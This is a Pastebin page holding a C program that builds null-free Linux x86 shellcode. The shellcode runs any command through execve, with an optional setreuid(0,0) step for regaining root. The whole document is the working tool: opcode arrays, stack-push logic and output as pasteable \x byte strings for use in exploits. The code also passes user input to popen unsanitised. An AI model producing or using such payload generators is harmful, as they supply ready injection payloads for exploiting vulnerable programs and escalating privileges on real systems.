Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <unistd.h>
- #include <linux/types.h>
- #define SETRUID 0 //set this to 1 if you want the shellcode to do setreuid(0,0) before the shell command
- void print_c(__u8*,int);
- void push_shc(__u8*, char*, int*);
- int main(int argc, char *argv[]){
- char cmd[255], *a;
- FILE *c;
- int k=0, totl=(SETRUID ? 32:22), b,b1, i, tmp=0, shp=2;
- __u8 *shc,start[2]={0x31,0xc0}, end[16]={0xb0,0x0b,0x89,0xf3,0x89,0xe1,0x31,0xd2,0xcd,0x80,0xb0,0x01,0x31,0xdb,0xcd,0x80}, struid[10]={0xb0,0x46,0x31,0xdb,0x31,0xc9,0xcd,0x80,0x31,0xc0};
- if(argc<2){
- printf(" Program path/to/execute\n");
- _exit(1);
- }
- a=(char *)malloc((9+strlen(argv[1]))*sizeof(char));
- //find the command path
- a[0]=0;
- strcat(a, "whereis ");
- strcat(a, argv[1]);
- c=popen(a, "r");
- while(((cmd[0]=fgetc(c))!=' ')&&(!feof(c)));
- while(((cmd[k++]=fgetc(c))!=' ')&&(!feof(c)));
- cmd[--k]=0;
- if(k==0){
- printf("No executables found for the command \"%s\".\n", argv[1]);
- _exit(1);
- }
- if(strlen(cmd)>254){
- printf("The lenght of the command path can't be over 254 bye.\n");
- _exit(1);
- }
- for(i=2;i<argc;i++)
- if(strlen(argv[i])>254){
- printf("The lenght of each command argument can't be over 254 byte.\n");
- _exit(1);
- }
- //work out the final shellcode lenght
- b=(k%2);
- b1=(b==1) ? (((k-1)/2)%2) : ((k/2)%2);
- totl+=(6+5*((k-(k%4))/4)+4*b1+7*b);
- for(i=2; i<argc;i++){
- k=strlen(argv[i]);
- b=(k%2);
- b1=(b==1) ? (((k-1)/2)%2) : ((k/2)%2);
- totl+=(6+5*((k-(k%4))/4)+4*b1+7*b);
- }
- totl+=4*(argc-2);
- printf("Shellcode lenght: %i\n", totl);
- //build the shellcode
- shc=(__u8 *)malloc((totl+1)*sizeof(__u8));
- memcpy(shc, start, 2);
- if(SETRUID){
- memcpy(shc+shp, struid, 10);
- shp+=10;
- }
- if(argc>2)
- push_shc(shc, argv[argc-1], &shp);
- else
- push_shc(shc, cmd, &shp);
- memset(shc+(shp++), 0x89, 1);
- memset(shc+(shp++), 0xe6, 1);
- if(argc>2){
- for(i=argc-2;i>1;i--)
- push_shc(shc, argv[i], &shp);
- push_shc(shc, cmd, &shp);
- }
- memset(shc+(shp++), 0x50, 1);
- memset(shc+(shp++), 0x56, 1);
- if(argc>2){
- for(i=argc-2;i>1;i--){
- memset(shc+(shp++), 0x83, 1);
- memset(shc+(shp++), 0xee, 1);
- memset(shc+(shp++), strlen(argv[i])+1, 1);
- memset(shc+(shp++), 0x56, 1);
- }
- memset(shc+(shp++), 0x83, 1);
- memset(shc+(shp++), 0xee, 1);
- memset(shc+(shp++), strlen(cmd)+1, 1);
- memset(shc+(shp++), 0x56, 1);
- }
- memcpy(shc+shp, end, 16);
- print_c(shc,totl);
- return 0;
- }
- void print_c(__u8 *s,int l){
- int k;
- for(k=0;k<l;k++){
- printf("\\x%.2x", s[k]);
- if(((k+1)%8)==0) printf("\n");
- }
- printf("\n");
- }
- void push_shc(__u8 *out, char *str, int *sp){
- int i=strlen(str), k, b, b1, tmp=i;
- __u8 pushb_0[6]={0x83,0xec,0x01,0x88,0x04,0x24},pushb[6]={0x83,0xec,0x01,0xc6,0x04,0x24};
- memcpy(out+(*sp), pushb_0, 6);
- *sp+=6;
- for(k=0;k<((i-(i%4))/4);k++){
- memset(out+((*sp)++), 0x68, 1);
- tmp-=4;
- memcpy(out+(*sp), str+tmp, 4);
- *sp+=4;
- }
- b=(i%2);
- b1=(b==1) ? (((i-1)/2)%2) : ((i/2)%2);
- if(b1){
- memset(out+((*sp)++), 0x66, 1);
- memset(out+((*sp)++), 0x68, 1);
- tmp-=2;
- memcpy(out+(*sp), str+tmp, 2);
- *sp+=2;
- }
- if(b){
- memcpy(out+(*sp), pushb, 6);
- *sp+=6;
- memcpy(out+((*sp)++), str+(--tmp), 1);
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement